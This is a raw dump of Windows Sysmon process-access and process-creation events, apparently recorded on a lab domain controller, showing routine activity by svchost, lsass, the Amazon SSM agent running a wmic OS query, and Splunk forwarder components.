13:34:22.537{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.537{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.536{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.535{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.535{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.535{59A5CD1D-8E5E-6005-6C00-00000000A301}3984C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.191{59A5CD1D-8E44-6005-0B00-00000000A301}856100C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.191{59A5CD1D-8E44-6005-0B00-00000000A301}856100C:\Windows\system32\lsass.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:22.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:22.064{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.869{59A5CD1D-8E5D-6005-6900-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:23.954{59A5CD1D-8E5F-6005-7000-00000000A301}31043876C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program 
